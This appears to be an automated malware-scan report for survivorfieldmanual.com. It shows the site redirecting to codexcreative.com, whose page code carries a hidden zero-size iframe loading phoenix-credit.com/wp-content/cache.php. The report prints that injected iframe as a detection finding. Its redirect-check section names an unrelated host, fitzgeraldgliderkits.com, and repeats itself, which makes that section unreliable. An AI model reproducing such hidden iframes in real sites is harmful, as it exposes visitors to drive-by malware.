Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=survivorfieldmanual.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fitzgeraldgliderkits.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 06:15:24 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://fitzgeraldgliderkits.com/>; rel=shortlink
Set-Cookie: wfvt_176621694=549513fc52524; expires=Sat, 20-Dec-2014 06:45:24 GMT; path=/; httponly
X-Pingback: http://fitzgeraldgliderkits.com/xmlrpc.php
GET / HTTP/1.1
Host: fitzgeraldgliderkits.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 06:15:24 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://fitzgeraldgliderkits.com/>; rel=shortlink
Set-Cookie: wfvt_176621694=549513fc52524; expires=Sat, 20-Dec-2014 06:45:24 GMT; path=/; httponly
X-Pingback: http://fitzgeraldgliderkits.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: fitzgeraldgliderkits.com
Referer: http://www.google.com/search?q=fitzgeraldgliderkits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fitzgeraldgliderkits.com
Referer: http://www.google.com/search?q=fitzgeraldgliderkits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://survivorfieldmanual.com/ | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 11:22:38 GMT Location: http://CodexCreative.com Server: Apache Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://codexcreative.com/ | 200 OK Content-Length: 30911 Content-Type: text/html | malicious |
Page code contains blacklisted domain: phoenix-credit.com <!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6" lang="en-US"> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="en-US"> <![endif]--> <!--[if (gte IE 9)|!(IE)]><!--><html lang="en-US"> <!--<![endif]--> <head> <!-- Basic Page Needs =================== ...[4181 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://phoenix-credit.com/wp-content/cache.php This URL is marked by Google as suspicious <iframe src="http://phoenix-credit.com/wp-content/cache.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> Hidden iFrame found. size: 0x0 src: http://google.com <iframe src="http://google.com" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> | ||
http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js?ver=2.6.2 | 200 OK Content-Length: 15414 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/plugins/CuteSlider/js/cute.slider.js?ver=1.1.1 | 200 OK Content-Length: 42563 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/plugins/CuteSlider/js/cute.transitions.all.js?ver=1.1.1 | 200 OK Content-Length: 16781 Content-Type: application/javascript | clean |
http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.1.0/respond.min.js?ver=1.1.0 | 200 OK Content-Length: 4069 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.1 | 200 OK Content-Length: 82579 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/froogaloop.min.js?ver=1.0 | 200 OK Content-Length: 8755 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/jquery.tubular.vimeo.js?ver=1.0 | 200 OK Content-Length: 7081 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/jquery.flexslider-min.js?ver=1.0 | 200 OK Content-Length: 16625 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/scripts.js?ver=1.0 | 200 OK Content-Length: 35785 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/jquery.prettyPhoto.js?ver=1.0 | 200 OK Content-Length: 22434 Content-Type: application/javascript | clean |
http://codexcreative.com/wp-content/themes/ninezeroseven/assets/js/main.js?ver=1.0 | 200 OK Content-Length: 6653 Content-Type: application/javascript | clean |
http://survivorfieldmanual.com/DanielJohnGonzalez-Resume2013.pdf | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 11:22:50 GMT Location: http://CodexCreative.com Server: Apache Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://codexcreative.com/test404page.js | 404 Not Found Content-Length: 1772 Content-Type: text/html | clean |